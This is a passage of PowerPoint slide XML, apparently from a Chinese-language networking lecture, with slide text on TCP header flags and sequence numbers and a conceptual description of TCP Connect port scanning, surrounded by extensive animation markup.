              <a:t>SYN=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，连接请求或连接接受报文</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Acknowledge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>＝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>确认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>号字段才</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>有效</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SEQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>太</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(&gt;IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>MTU)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>需分段，记录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>报文序号，以便重组。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>随机产生</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32772"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32772"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3277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2771"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32771"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32771"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32771"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3277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2782"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32782"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32782"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32782"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="23" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="32780"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32780"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32780"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32780"/>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2779"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32779"/>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2781"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="327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773"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3277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2778"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="327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2783"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3278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2774"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3277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2784"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="327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2775"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32775"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="59" fill="hold">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32776"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32776"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32776"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="64" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="65" presetID="17" presetClass="entr" presetSubtype="10" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="32777"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32777"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32777"/>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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7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p:bldP spid="32772" grpId="0" animBg="1"/>
      <p:bldP spid="32773" grpId="0" animBg="1"/>
      <p:bldP spid="32774" grpId="0" animBg="1"/>
      <p:bldP spid="32775" grpId="0" animBg="1"/>
      <p:bldP spid="32776" grpId="0" animBg="1"/>
      <p:bldP spid="32777" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="32778" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="32779" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="32781" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="32783" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="32784" grpId="0" bldLvl="0" autoUpdateAnimBg="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调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>connect()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>与目标计算机建立连接（完整三次握手）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>connect()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>成功：端口处于侦听状态</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>否则，端口关闭</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382978" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开放扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP Connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47033000-3624-48BD-B70B-41315F6EB578}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
